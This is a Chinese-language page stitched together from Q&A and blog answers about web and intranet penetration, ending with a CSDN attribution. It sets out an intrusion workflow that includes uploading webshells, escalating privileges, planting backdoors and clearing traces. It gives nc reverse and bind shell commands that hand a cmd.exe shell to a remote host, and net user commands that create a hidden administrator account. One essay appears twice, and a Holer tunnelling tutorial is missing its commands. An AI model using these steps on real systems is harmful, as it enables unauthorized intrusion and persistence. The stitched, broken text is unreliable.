滲透web內網

1. web滲透是什麼

Web滲透測試分為白盒測試和黑盒測試，白盒測試是指目標網站的源碼等信息的情況下對其滲透，相當於代碼分析審計。而黑盒測試則是在對該網站系統信息不知情的情況下滲透，以下所說的Web滲透就是黑盒滲透。

Web滲透分為以下幾個步驟，信息收集，漏洞掃描，漏洞利用，提權，內網滲透，留後門，清理痕跡。一般的滲透思路就是看是否有注入漏洞，然後注入得到後台管理員賬號密碼，登錄後台，上傳小馬，再通過小馬上傳大馬，提權，內網轉發，進行內網滲透，掃描內網c段存活主機及開放埠，看其主機有無可利用漏洞（nessus）埠（nmap）對應服務及可能存在的漏洞，對其利用（msf）拿下內網，留下後門，清理痕跡。或者看是否有上傳文件的地方，上傳一句話木馬，再用菜刀鏈接，拿到資料庫並可執行cmd命令，可繼續上大馬.........思路很多，很多時候成不成功可能就是一個思路的問題，技術可以不高，思路一定得騷。

信息收集

信息收集是整個流程的重中之重，前期信息收集的越多，Web滲透的成功率就越高。

DNS域名信息：通過url獲取其真實ip,子域名(Layer子域名爆破機)，旁站(K8旁站，御劍1.5)，c段，網站負責人及其信息（whois查詢）

整站信息：伺服器操作系統、伺服器類型及版本(Apache/Nginx/Tomcat/IIS)、資料庫類型(Mysql/Oracle/Accees/Mqlserver)、腳本類型(php/jsp/asp/aspx)、CMS類型；

網站常見搭配為：

ASP和ASPX：ACCESS、SQLServer

PHP：MySQL、PostgreSQL

JSP：Oracle、MySQL

敏感目錄信息（御劍，dirbust）

開放埠信息（nmp）

漏洞掃描

利用AWVS,AppScan,OWASP-ZAP,等可對網站進行網站漏洞的初步掃描，看其是否有可利用漏洞。

常見漏洞：

SQL注入

XSS跨站腳本

CSRF跨站請求偽造

XXE(XML外部實體注入)漏洞

SSRF(服務端請求偽造)漏洞

文件包含漏洞

文件上傳漏洞

文件解析漏洞

遠程代碼執行漏洞

CORS跨域資源共享漏洞

越權訪問漏洞

目錄遍歷漏洞和任意文件讀取/下載漏洞

漏洞利用

用工具也好什麼也好對相應漏洞進行利用

如：

Sql注入（sqlmap）

XSS（BEEF）

後台密碼爆破（burp）

埠爆破（hydra）

提權

獲得shell之後我們許可權可能很低，因此要對自己提權，可以根據伺服器版本對應的exp進行提權，對於Windows系統也可看其補丁對應漏洞的exp進行提權

內網滲透

首先進行埠轉發可用nc

nc使用方法：

反向連接

在公網主機上進行監聽：

nc-lvp 4444

在內網主機上執行：

nc-e cmd.exe 公網主機ip4444

成功之後即可得到一個內網主機shell

正向連接

遠程主機上執行：

nc-l -p 4444 -t -e cmd.exe

本地主機上執行：

nc-vv 遠程主機ip4444

成功後，本地主機即可遠程主機的一個shell

然後就是對內網進行滲透了，可以用主機漏洞掃描工具（nessus,x-scan等）進行掃描看是否有可用漏洞，可用msf進行利用，或者用nmap掃描存活主機及開放埠，可用hydra進行埠爆破或者用msf對埠對應漏洞得到shell拿下內網留後門

留後門

對於網站上傳一句話木馬，留下後門

對於windows用戶可用hideadmin創建一個超級隱藏賬戶

手工：

netuser test$ 123456 /add

netlocalgroup administrators test$ /add

這樣的話在cmd命令中看不到，但在控制面板可以看到，還需要改注冊表才能實現控製版面也看不到，太過麻煩，不多贅述，所以還是用工具省心省力。

2. 新手想要學web滲透，網路安全，要如何開始

首先想想是不是真心想學，這條路註定孤獨寂寞，不斷碰壁。
想好後，就要每天堅持。
我的一些建議：每天多任務進行，比如早上兩小時看英語學習，之後看語言，（C語言之後python之後php），下午看些網路上的滲透資料，晚上實踐，等到資料看完。可以開始看看滲透博客，然後下午晚上自由分配

3. 如何內網滲透入侵，方法是什麼呀高手點

只能告訴你內網入侵相對外網入侵要容易上手，只不過入侵不可能一兩下子就可以說得清楚。入侵一台電腦完全可看條件而定的。內網入侵思路如下，先用相應的區域網掃描工具來掃描有漏洞的肉機，然後再進行各自不同的漏洞來達到入侵目的

4. 怎麼利用內網穿透把自己電腦做成web伺服器實現發布網站

可以申請一個單獨IP，然後進行架設web網站，不過即使做網站發布，速度上也有不快（屬於城域網，其他地區的用戶訪問起來比較慢）
如果不考慮那麼高的，可以使用虛擬主機/vps主機等，性價比高些，最主要是有廣域網IP，方便其他地區的訪問。

5. 如何進行Web滲透測試

什麼是滲透測試？

滲透測試，是滲透測試工程師完全模擬黑客可能使用的攻擊技術和漏洞發現技術，對目標網路、主機、應用的安全作深入的探測，發現系統最脆弱的環節。

如何進行Web滲透測試？

完整web滲透測試框架當需要測試的web應用數以千計，就有必要建立一套完整的安全測試框架，流程的最高目標是要保證交付給客戶的安全測試服務質量。

1、立項：項目建立，時間安排，人力分配，目標制定，廠商介面人確定；

系統分析&威脅分析：針對具體的web應用，分析系統架構、使用的組件、對外提供的介面等，以STRIDE為威脅模型進行對應的安全威脅分析，輸出安全威脅分析表，重點關注top3威脅；

制定測試用例：根據威脅分析的結果制定對應的測試用例，測試用例按照模板輸出，具備可執行性；

測試執行&漏洞挖掘：測試用例執行&發散測試，挖掘對應的安全問題or漏洞；

問題修復&回歸測試：指導客戶應用開發方修復安全問題or漏洞，並進行回歸測試，確保安全問題or漏洞得到修復，並且沒有引入新的安全問題；

項目總結評審：項目過程總結，輸出文檔評審，相關文檔歸檔。

2、Web應用的滲透測試流程

主要分為3個階段，分別是：信息收集→漏洞發現→漏洞利用，下面仔細分析一下各個階段流程：

一、信息收集

在信息收集階段，我們需要盡量多的收集關於目標web應用的各種信息，比如：腳本語言的類型、伺服器的類型、目錄的結構、使用的開源軟體、資料庫類型、所有鏈接頁面，用到的框架等

腳本語言的類型：常見的腳本語言的類型包括：php、asp、aspx、jsp等

測試方法：

1 爬取網站所有鏈接，查看後綴

2 直接訪問一個不存在頁面後面加不同的後綴測試

3 查看robots.txt，查看後綴

伺服器的類型：常見的web伺服器包括：apache、tomcat、IIS、ngnix等

測試方法：

1 查看header，判斷伺服器類型

2 根據報錯信息判斷

3 根據默認頁面判斷

目錄的結構：了解更多的目錄，可能發現更多的弱點，如：目錄瀏覽、代碼泄漏等。

測試方法

1 使用字典枚舉目錄

2 使用爬蟲爬取整個網站，或者使用google等搜索引擎獲取

3 查看robots.txt是否泄漏

使用的開源軟體：我們如果知道了目標使用的開源軟體，我們可以查找相關的軟體的漏洞直接對網站進行測試。

測試方法

指紋識別（網路上有很多開源的指紋識別工具）

資料庫類型：對於不同的資料庫有不同的測試方法。

測試方法

1 使應用程序報錯，查看報錯信息

2 掃描伺服器的資料庫埠（沒做NAT且防火牆不過濾時有效）

所有鏈接頁面：這個跟前面的獲取目錄結構類似，但是這個不只是獲取網站的所有功能頁面，有時候還可以獲取到管理員備份的源碼。

測試方法

1 使用字典枚舉頁面

2 使用爬蟲爬取整個網站，或者使用google等搜索引擎獲取

3 查看robots.txt是否泄漏

用到的框架：很多網站都利用開源的框架來快速開發網站，所以收集網站的框架信息也是非常關鍵的。

測試方法

指紋識別（網路上有很多開源的指紋識別工具）

二、漏洞發現

在這個階段我們在做測試的時候要對症下葯，不能盲目的去掃描，首先要確定目標應用是否使用的是公開的開源軟體，開源框架等、然後在做深一度的漏洞掃描。

關於開源軟體的漏洞發現

開源的軟體：常見的開源軟體有wordpress、phpbb、dedecms等

開源的框架：常見的開源框架有Struts2、 Spring MVC、ThinkPHP等

中間件伺服器：常見的中間件伺服器有jboss、tomcat、Weblogic等

資料庫服務：常見的資料庫服務mssql、mysql、oracle、redis、sybase、MongoDB、DB2等

對於開源軟體的測試方法

1 通過指紋識別軟體判斷開源軟體的版本信息，針對不同的版本信息去開放的漏洞資料庫查找相應版本的漏洞進行測試

2 對於默認的後台登錄頁、資料庫服務埠認證等入口可以進行簡單的暴力破解、默認口令嘗試等操作

3 使用開源的漏洞發現工具對其進行漏洞掃描，如：WPScan

關於自主開發的應用

手動測試：這個階段，我們需要手工測試所有與用戶交互的功能，比如：留言、登入、下單、退出、退貨、付款等操作

軟體掃描：使用免費的軟體掃描，如：appscan、wvs、netsparker，burp等

可能存在的漏洞

Owasp關鍵點

代碼安全之上傳文件

代碼安全之文件包含

代碼安全之SSRF

邏輯漏洞之密碼重置

邏輯漏洞之支付漏洞

邏輯漏洞之越權訪問

平台安全之中間件安全

三、漏洞利用

針對不同的弱點有不同的漏洞利用方式，需要的知識點也比較多。一般這個階段包括兩種方式，一種是手工測試，一種是工具測試

手工測試

手工測試是通過客戶端或伺服器訪問目標服務，手工向目標程序發送特殊的數據，包括有效的和無效的輸入，觀察目標的狀態、對各種輸入的反應，根據結果來發現問題的漏洞檢測技術。手工測試不需要額外的輔助工具，可由測試者獨立完成，實現起來比較簡單。但這種方法高度依賴於測試者，需要測試者對目標比較了解。手工測試可用於Web應用程序、瀏覽器及其他需要用戶交互的程序。

這種方式對於有特殊過濾等操作，或者網路上沒有成型的利用工具的時候可以使用。

工具測試

網路上有很多好用的免費利用工具，比如針對sql注入的sqlmap、針對軟體漏洞的matesploit等。

6. 如何使用metasploit進行內網滲透詳細過程

身處不同的滲透測試環境下就會有不同的滲透思路以及滲透的技術手段，今天我們將從攻與守兩個不同的視角來了解滲透測試在不同處境下所使用的技術手段。 從攻方視角看滲透 攻方既包括了潛在的黑客、入侵者，也包括了經過企業授權的安全專家。在很多黑客的視角中，只要你投入了足夠多的時間和耐心，那麼這個世界上就沒有不可能滲透的目標。目前我們只從授權滲透的角度來討論滲透測試的攻擊路徑及其可能採用的技術手段。 測試目標的不同，自然也導致了技術手段的不同，接下來我們將簡單說明在不同的位置可能採用的技術手段。 內網測試 內網測試指的是由滲透測試人員在內部網路發起的測試，這類的測試能夠模擬企業內部違規操作者的行為。它的最主要的「優勢」就是繞過了防火牆的保護。內部可能採用的主要滲透方式有：遠程緩沖區溢出，口令猜測，以及B/S或C/S應用程序測試（如果在滲透測試中有涉及到C/S程序測試的，那麼就需要提前准備相關客戶端軟體供測試使用）。 外網測試 外網測試則恰恰與內網測試相反，在此類測試當中滲透測試人員完全處於外部網路（例如撥號、ADSL或外部光纖），來模擬對內部狀態一無所知的外部攻擊者的行為。外部可能採用的滲透方式包括：對網路設備的遠程攻擊，口令管理安全性測試，防火牆規則試探、規避、Web及其它開放應用服務的安全性測試。 不同網段/Vlan之間的滲透 這種滲透方式是從某內/外部網段，嘗試對另一網段/Vlan來進行滲透。這類測試通常可能用到的技術包括：對網路設備的遠程攻擊、對防火牆的遠程攻擊或規則探測、規避嘗試。 信息的收集和分析伴隨著滲透測試的每一個步驟，而每一個步驟又有三個部分組成：操作、響應和結果分析。 埠掃描 通過對目標地址的TCP/UDP埠掃描，確定其所開放的服務的數量以及類型，這是所有滲透測試的基礎。埠掃描是計算機解密高手喜歡的一種方式。通過埠掃描，可以大致確定一個系統的基本信息並搜集到很多關於目標主機的各種有用的信息，然後再結合安全工程師的相關經驗就可以確定其可能存在的以及可能被利用的安全弱點，從而為進行深層次的滲透提供可靠性依據。 遠程溢出 這是當前出現的頻率最高、威脅最嚴重，同時又是最容易實現的一種滲透方法，一個僅僅具有一般的基礎性網路知識的入侵者就可以在相當短的時間內利用現成的工具實現遠程溢出攻擊。 對於防火牆內的系統同樣存在這樣的風險，只要對跨接防火牆內外的一台主機攻擊成功，那麼通過這台主機對防火牆內的主機進行攻擊就易如反掌。 口令猜測 口令猜測也是一種出現概率很高的風險，幾乎不需要任何攻擊工具，利用一個簡單的暴力攻擊程序和一個比較完善的字典，就可以進行猜測口令。 對一個系統賬號的猜測通常包括兩個方面：首先是對用戶名的猜測，其次是對密碼的猜測。只要攻擊者能猜測或者確定用戶口令，就能獲得機器或者網路的訪問權，並且能夠訪問到用戶能夠訪問的審核信息資源。 本地溢出 所謂本地溢出是指在擁有了一個普通用戶的賬號之後，通過一段特殊的指令代碼來獲取管理員許可權的方法。使用本地溢出的前提是首先你要獲得一個普通用戶密碼。也就是說由於導致本地溢出的一個關鍵條件是設置不當的密碼策略。 多年的實踐證明，在經過前期的口令猜測階段獲取的普通賬號登錄系統之後，對系統實施本地溢出攻擊，就能獲取不進行主動安全防禦的系統的控制管理許可權。 腳本及應用測試 Web腳本及應用測試專門針對Web及資料庫伺服器進行。根據最新的技術統計表明，腳本安全弱點是當前Web系統尤其是存在動態內容的Web系統比較嚴重的安全弱點之一。利用腳本相關弱點輕則可以獲取系統其他目錄的訪問許可權，重則將有可能取得系統的控制管理許可權。因此對於含有動態頁面的Web、資料庫等系統，Web腳本及應用測試將是滲透測試中必不可少的一個環節。 在Web腳本及應用測試中，可能需要檢查的部份包括： （1）檢查應用系統架構,防止用戶繞過系統直接修改資料庫； （2）檢查身份認證模塊，用以防止非法用戶繞過身份認證； （3）檢查資料庫介面模塊，用以防止用戶獲取系統許可權； （4）檢查文件介面模塊，防止用戶獲取系統文件； （5）檢查其他安全威脅。 無線測試 雖然中國的無線網路還處於建設時期，但是無線網路的部署及其簡易，所以在一些大城市裡的普及率已經很高了。在北京和上海的商務區內至少有80%的地方都可以找到接入點。 通過對無線網路的測試，可以判斷企業區域網的安全性，這已經成為滲透測試中越來越重要的環節。 除了以上的測試手段以外，還有一些可能會在滲透測試過程中使用的技術，包括：社交工程學、拒絕服務攻擊，以及中間人攻擊。 從守方視角看滲透 當具備滲透測試攻擊經驗的人們站到系統管理員的角度，要保障一個大網的安全時，我們會發現，關注點是完全不同的。從攻方的視角看是「攻其一點，不及其餘」，只要找到一個小漏洞，就有可能撕開整條戰線；但如果你從守方的視角來看，就會發現往往是「千里之堤，毀於蟻穴」。因此，必須要有好的理論指引，從技術到管理都要注重安全，才能使網路固若金湯。 滲透測試的必要性 滲透測試利用網路安全掃描器、專用安全測試工具和富有經驗的安全工程師的人工經驗對網路中的核心服務及其重要的網路設備，包括伺服器、網路設備、防火牆等進行非破壞性質的模擬黑客攻擊，目的是侵入系統並獲取機密信息並將入侵的過程和細節產生報告給用戶，從而實現網路信息安全的防護。 滲透測試和工具掃描可以很好的互相補充。工具掃描具有很好的效率和速度，但存在一定的誤報率和漏報率，並且不能發現高層次的、復雜的、並且相互關聯的安全問題；而滲透測試則需要投入大量的人力資源、並且對測試者的專業技能要求很高（滲透測試報告的價值直接依賴於測試者的專業技能水平），但是非常准確，可以發現邏輯性更強、更深層次的弱點，效果更加的明顯。 一般的滲透測試流程如下： 時間的選擇 為減少滲透測試對網路和主機的負面影響，滲透測試的時間盡量安排在業務量不大的時段或者是晚上。 策略的選擇 為了防止滲透測試造成網路和主機的業務中斷的問題，在滲透測試的過程中盡量不使用含有拒絕服務的測試策略。 授權滲透測試的監測手段 在評估過程中，由於滲透測試的特殊性，用戶可以要求對整體測試流程進行實時的監控（PS：可能會提高滲透測試的成本）。 測試方自控 由滲透測試方對本次測透測試過程中的三方面數據進行完整記錄：操作、響應、分析，最終會形成完整有效的滲透測試報告並將其提交給用戶。 用戶監控 用戶監控一共有四種形式： 全程監控：採用類似Ethereal的嗅探軟體進行全程抓包嗅探； 擇要監控：對其掃描過程不進行錄制，僅在安全工程師分析數據後，准備發起滲透前才開啟軟體進行嗅探； 主機監控：僅監控受測主機的存活狀態，用以避免意外情況發生； 指定攻擊源：用戶指定由特定攻擊源地址進行攻擊，該源地址的主機由用戶進行進程、網路連接、數據傳輸等多方面的監督控制。 （友情提示：文章中會出現與之前文章些許重復的情況，望各位親包容，不過重復即是記憶。大家要常駐米安網哦!）

7. 滲透內網需要什麽步驟

掃描，破解，登陸內網
如果已經有內網主機，可嘗試社會工程學

8. 如何突破防火牆進行內網的滲透測試

身處不同的滲透測試環境下就會有不同的滲透思路以及滲透的技術手段，今天我們將從攻與守兩個不同的視角來了解滲透測試在不同處境下所使用的技術手段。

從攻方視角看滲透

攻方既包括了潛在的黑客、入侵者，也包括了經過企業授權的安全專家。在很多黑客的視角中，只要你投入了足夠多的時間和耐心，那麼這個世界上就沒有不可能滲透的目標。目前我們只從授權滲透的角度來討論滲透測試的攻擊路徑及其可能採用的技術手段。

測試目標的不同，自然也導致了技術手段的不同，接下來我們將簡單說明在不同的位置可能採用的技術手段。

內網測試

內網測試指的是由滲透測試人員在內部網路發起的測試，這類的測試能夠模擬企業內部違規操作者的行為。它的最主要的「優勢」就是繞過了防火牆的保護。內部可能採用的主要滲透方式有：遠程緩沖區溢出，口令猜測，以及B/S或C/S應用程序測試（如果在滲透測試中有涉及到C/S程序測試的，那麼就需要提前准備相關客戶端軟體供測試使用）。

外網測試

外網測試則恰恰與內網測試相反，在此類測試當中滲透測試人員完全處於外部網路（例如撥號、ADSL或外部光纖），來模擬對內部狀態一無所知的外部攻擊者的行為。外部可能採用的滲透方式包括：對網路設備的遠程攻擊，口令管理安全性測試，防火牆規則試探、規避、Web及其它開放應用服務的安全性測試。

不同網段/Vlan之間的滲透

這種滲透方式是從某內/外部網段，嘗試對另一網段/Vlan來進行滲透。這類測試通常可能用到的技術包括：對網路設備的遠程攻擊、對防火牆的遠程攻擊或規則探測、規避嘗試。

信息的收集和分析伴隨著滲透測試的每一個步驟，而每一個步驟又有三個部分組成：操作、響應和結果分析。

埠掃描

通過對目標地址的TCP/UDP埠掃描，確定其所開放的服務的數量以及類型，這是所有滲透測試的基礎。埠掃描是計算機解密高手喜歡的一種方式。通過埠掃描，可以大致確定一個系統的基本信息並搜集到很多關於目標主機的各種有用的信息，然後再結合安全工程師的相關經驗就可以確定其可能存在的以及可能被利用的安全弱點，從而為進行深層次的滲透提供可靠性依據。

遠程溢出

這是當前出現的頻率最高、威脅最嚴重，同時又是最容易實現的一種滲透方法，一個僅僅具有一般的基礎性網路知識的入侵者就可以在相當短的時間內利用現成的工具實現遠程溢出攻擊。

對於防火牆內的系統同樣存在這樣的風險，只要對跨接防火牆內外的一台主機攻擊成功，那麼通過這台主機對防火牆內的主機進行攻擊就易如反掌。

口令猜測

口令猜測也是一種出現概率很高的風險，幾乎不需要任何攻擊工具，利用一個簡單的暴力攻擊程序和一個比較完善的字典，就可以進行猜測口令。

對一個系統賬號的猜測通常包括兩個方面：首先是對用戶名的猜測，其次是對密碼的猜測。只要攻擊者能猜測或者確定用戶口令，就能獲得機器或者網路的訪問權，並且能夠訪問到用戶能夠訪問的審核信息資源。

本地溢出

所謂本地溢出是指在擁有了一個普通用戶的賬號之後，通過一段特殊的指令代碼來獲取管理員許可權的方法。使用本地溢出的前提是首先你要獲得一個普通用戶密碼。也就是說由於導致本地溢出的一個關鍵條件是設置不當的密碼策略。

多年的實踐證明，在經過前期的口令猜測階段獲取的普通賬號登錄系統之後，對系統實施本地溢出攻擊，就能獲取不進行主動安全防禦的系統的控制管理許可權。

腳本及應用測試

Web腳本及應用測試專門針對Web及資料庫伺服器進行。根據最新的技術統計表明，腳本安全弱點是當前Web系統尤其是存在動態內容的Web系統比較嚴重的安全弱點之一。利用腳本相關弱點輕則可以獲取系統其他目錄的訪問許可權，重則將有可能取得系統的控制管理許可權。因此對於含有動態頁面的Web、資料庫等系統，Web腳本及應用測試將是滲透測試中必不可少的一個環節。

在Web腳本及應用測試中，可能需要檢查的部份包括：

（1）檢查應用系統架構,防止用戶繞過系統直接修改資料庫；
（2）檢查身份認證模塊，用以防止非法用戶繞過身份認證；
（3）檢查資料庫介面模塊，用以防止用戶獲取系統許可權；
（4）檢查文件介面模塊，防止用戶獲取系統文件；
（5）檢查其他安全威脅。

無線測試

雖然中國的無線網路還處於建設時期，但是無線網路的部署及其簡易，所以在一些大城市裡的普及率已經很高了。在北京和上海的商務區內至少有80%的地方都可以找到接入點。

通過對無線網路的測試，可以判斷企業區域網的安全性，這已經成為滲透測試中越來越重要的環節。

除了以上的測試手段以外，還有一些可能會在滲透測試過程中使用的技術，包括：社交工程學、拒絕服務攻擊，以及中間人攻擊。

從守方視角看滲透

當具備滲透測試攻擊經驗的人們站到系統管理員的角度，要保障一個大網的安全時，我們會發現，關注點是完全不同的。從攻方的視角看是「攻其一點，不及其餘」，只要找到一個小漏洞，就有可能撕開整條戰線；但如果你從守方的視角來看，就會發現往往是「千里之堤，毀於蟻穴」。因此，必須要有好的理論指引，從技術到管理都要注重安全，才能使網路固若金湯。

滲透測試的必要性

滲透測試利用網路安全掃描器、專用安全測試工具和富有經驗的安全工程師的人工經驗對網路中的核心服務及其重要的網路設備，包括伺服器、網路設備、防火牆等進行非破壞性質的模擬黑客攻擊，目的是侵入系統並獲取機密信息並將入侵的過程和細節產生報告給用戶，從而實現網路信息安全的防護。

滲透測試和工具掃描可以很好的互相補充。工具掃描具有很好的效率和速度，但存在一定的誤報率和漏報率，並且不能發現高層次的、復雜的、並且相互關聯的安全問題；而滲透測試則需要投入大量的人力資源、並且對測試者的專業技能要求很高（滲透測試報告的價值直接依賴於測試者的專業技能水平），但是非常准確，可以發現邏輯性更強、更深層次的弱點，效果更加的明顯。

一般的滲透測試流程如下：

時間的選擇

為減少滲透測試對網路和主機的負面影響，滲透測試的時間盡量安排在業務量不大的時段或者是晚上。

策略的選擇

為了防止滲透測試造成網路和主機的業務中斷的問題，在滲透測試的過程中盡量不使用含有拒絕服務的測試策略。

授權滲透測試的監測手段

在評估過程中，由於滲透測試的特殊性，用戶可以要求對整體測試流程進行實時的監控（PS：可能會提高滲透測試的成本）。

測試方自控

由滲透測試方對本次測透測試過程中的三方面數據進行完整記錄：操作、響應、分析，最終會形成完整有效的滲透測試報告並將其提交給用戶。

用戶監控

用戶監控一共有四種形式：

全程監控：採用類似Ethereal的嗅探軟體進行全程抓包嗅探；
擇要監控：對其掃描過程不進行錄制，僅在安全工程師分析數據後，准備發起滲透前才開啟軟體進行嗅探；
主機監控：僅監控受測主機的存活狀態，用以避免意外情況發生；
指定攻擊源：用戶指定由特定攻擊源地址進行攻擊，該源地址的主機由用戶進行進程、網路連接、數據傳輸等多方面的監督控制。

（友情提示：文章中會出現與之前文章些許重復的情況，望各位親包容，不過重復即是記憶。大家要常駐米安網哦!）

9. 又一款帶Web管理界面的內網穿透工具

一個免費的內網穿透工具Holer，它可以將區域網伺服器代理到公網的內網穿透工具，支持轉發基於TCP等協議的報文，作者現在服務端代碼已經開源了，而且帶Web管理面板，這里就大概說下，我們就可以拿來自建一個內網穿透伺服器，使用效果還不錯。

截圖

Github地址： https://github.com/Wisdom-Projects/holer

支持系統： Windows、Linux系統，這里只說Linux搭建，建議直接Den。

說明： 由於該面板使用的JAVA，所以還是比較消耗內存的，如果內存太小，建議先加一點虛擬內存，可以使用Swap一鍵腳本→傳送門。

1、安裝JAVA

2、安裝Mysql

如果Debian或Ubuntu在安裝期間有彈出窗口要你輸入密碼就設置一個，沒有的話密碼就是空格。

修改資料庫密碼：

最後修改過密碼的還需要重啟資料庫：

此時Mysql算是安裝完成了。

3、安裝源碼

安裝unzip：

下載源碼：

關鍵配置如下：

修改後使用Ctrl+x、y保存退出，或者可以直接使用FTP等工具直接編輯。

再修改管理員用戶名和密碼，使用命令：

admin和admin123為管理員用戶名和密碼，自行修改，修改完成後同樣的使用Ctrl+x、y保存退出。

最後啟動：

如果想開機自啟的話，這里可以建一個簡單的systemd配置文件，且不適用CentOS 6，使用命令：

然後啟動並設置開機自啟：

然後就可以使用ip:600訪問管理界面了，具體埠以你修改的為准。

然後CentOS系統建議關閉防火牆使用，或者打開部分埠也行，關閉命令：

像阿里雲等伺服器，還需要去安全組那裡開放下埠。

首先我們需要去用戶列表新建一個用戶，然後再去埠映射選擇該用戶，新建一個穿透規則，這里根據需求自行選擇，然後設置好時長。

然後就可以直接在客戶端使用了，一般客戶端有JAVA和GO版，使用JAVA的話，需要先安裝JAVA環境，所以這里直接選擇GO版本，簡單粗暴。

首先根據直接的系統和架構下載指定的GO版客戶端，每個壓縮包里都包含32位和64位，下載地址→傳送門。

這里拿我們常見的Linux伺服器架構來說，直接使用命令：

如果是Windows系統，先把壓縮包下載並解壓到D盤根目錄，然後按住Win+R，輸入cmd進入命令窗口，使用命令：

到這里基本上就運行成功了。

如果你想使用域名來配置伺服器面板的話，就需要安裝Web伺服器了，這里就直接使用Nginx。

1、安裝Nginx

2、申請SSL證書

這里就使用簡單粗暴的webroot方式簽發Let's Encrypt證書，首先解析好域名並生效。

安裝letsencrypt：

申請SSL證書：

請替換成自己域名後運行，期間會要你輸入郵箱和A選項啥的，申請後證書文件在/etc/letsencrypt/live。

3、新建conf文件

重啟Nginx生效：

最後連接的時候，就可以填域名了。

最後要是覺得搭建伺服器麻煩，或者不想搭建的，可以使用作者提供的免費服務，更多使用方法移至→傳送門。

10. Web滲透是怎麼弄的

1.滲透目標
滲透網站（這里指定為www.xxx.com）
切記，在滲透之前要簽訂協議。
2.信息收集
建議手動檢查和掃描器選擇同時進行。
2.1 網站常規檢測（手動）
1：瀏覽www.xxx.com
1. 初步確定網站的類型：例如銀行，醫院，政府等。
2. 查看網站功能模，比如是否有論壇，郵箱等。
3. 重點記錄網站所有的輸入點（與資料庫交互的頁面），比如用戶登錄，用戶注冊，留言板等。4. 重點查看網站是否用到了一些通用的模板，比如論壇選擇了動網(dvbss)，就有可能存在動網的漏洞；郵箱有可能選擇通用的郵箱系統，也有漏洞。
2: 分析網站的url1. 利用搜索引擎,搜索網站的url,快速找到網站的動態頁面。
2. 對網站的域名進行反查，查看IP，確定伺服器上的域名數，如果主頁面url檢測沒有漏洞，可以對其他的域名進行檢測。
3：審查代碼
重點對輸入代碼（比如表單）進行分析，看如何來提交輸入，客戶端做了哪些輸入的限制方法。
1. 隱藏表單欄位 hidden
2. Username,Password等
4：控制項分析
Active x 通常都是用c/c++編寫
在頁面上（通常是首頁）的源碼中搜索
1. 需要ComRaider+OD 對dll文件進行反編譯，看是否有漏洞。
2. 改變程序執行的路徑，破壞Active X 實施的輸入確認，看web的回應。
5：對常規的輸入進行手動注入測試，測試是否有sql注入和跨站漏洞，試用常規的用戶名和密碼登錄。
6：查看web伺服器的版本，確定搜索是否有低版本伺服器組件和框架的漏洞，比如通用的Java框架Struct2的漏洞。
2.2 工具選擇和使用
1：web應用程序漏洞掃描工具
Appscan: （版本7.8）
掃描漏洞比較全，中文，漏洞利用率高，檢測速度慢，需要大量內存，重點推薦。
AWVS:
英文，漏洞庫完善，檢測速度慢。
JSky
中文，檢測速度快，但深度一般。
Nessus
英文，檢測速度較快，漏洞也比較完善，免費，可及時更新，B/S界面。
2：埠掃描
Nmap
流光
3: 口令破解工具
溯雪
4：sql 注入工具
Asp+SqlServe, ACCESS：啊D注入工具
Php+MySQL : php+mysql注入工具（暗組的hacker欄中）
Jsp+ORACAL: CnsaferSI
支持以上資料庫 Pangolin
5: http代理請求
Paros
6:木馬
灰鴿子
7：提權木馬
一句話木馬大馬（具體所用的木馬參考文檔和工具包（綠盟，暗組））
5: 工具推薦使用方案
Appscan掃描出的重大漏洞，進行手工檢測（注意看漏洞是如何發現的，修改漏洞的代碼，對滲透幫助很大）。
sql注入漏洞
可以選用根據網站類型選擇sql注入工具
如果是post請求類型的url，選擇使用paros代理後，修改http請求包，進行注入。
WebDEV漏洞
可以啟用發送請求（比如DELETE對方網頁）
跨站漏洞
直接將appscan的代碼輸入測試，成功後，可以嘗試跨其他腳本（比如
遍歷漏洞:
網頁的目錄，下載網站配置文件信息，和源文件進行反編譯
反編譯：
Class 可以選用java 反編譯工具
Dll (asp.net) 選用Reflector
3.分析並滲透
---------------------
作者：centos2015
來源：CSDN
原文：https://blog.csdn.net/zonghua521/article/details/78272634
版權聲明：本文為博主原創文章，轉載請附上博文鏈接！